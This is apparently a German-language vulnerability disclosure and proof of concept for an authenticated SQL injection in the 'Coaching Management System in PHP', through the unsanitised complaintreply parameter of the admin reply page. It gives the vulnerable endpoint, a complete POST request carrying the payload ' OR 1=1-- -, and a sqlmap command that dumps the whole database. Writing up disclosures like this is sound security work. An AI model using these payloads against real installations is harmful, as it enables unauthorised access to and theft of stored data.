
Proof of Concept für authentifizierte SQL-Injection im Coaching Management System, das den Datenbank-Dump über den nicht bereinigten `complaintreply`-Parameter demonstriert.
Eine SQL-Injection-Schwachstelle besteht im Coaching Management System in PHP. Der Parameter complaintreply in der Admin-Antwortfunktion wird nicht ordnungsgemäß bereinigt, bevor er in SQL-Abfragen verwendet wird. Ein authentifizierter Angreifer (Admin) kann bösartige SQL-Abfragen injizieren, was zur vollständigen Extraktion der Datenbank führt.
/cims/modules/admin/reply.phpcomplaintreplycode-projects.org
Coaching Management System in PHP https://code-projects.org/coaching-management-system-in-php-with-source-code/
Unbekannt (Getestet mit der neuesten verfügbaren Version Stand April 2026)
Student reicht Beschwerde ein 
Admin öffnet die Beschwerde und greift auf die Antwortfunktion zu
POST /cims/modules/admin/reply.php?complaintid=18 HTTP/1.1 Host: 192.168.0.9 Content-Type: application/x-www-form-urlencoded
complaintreply=' OR 1=1-- -&submit=submit

Abfangen der Anfrage über Burp Suite 
Payload injizieren:
'

SQL-Fehler beobachtet
7. Injection bestätigen:
' OR 1=1-- -

Datenbank mit folgendem Befehl auslesen:
sqlmap -r sqli.txt --dump

Schweregrad: KRITISCH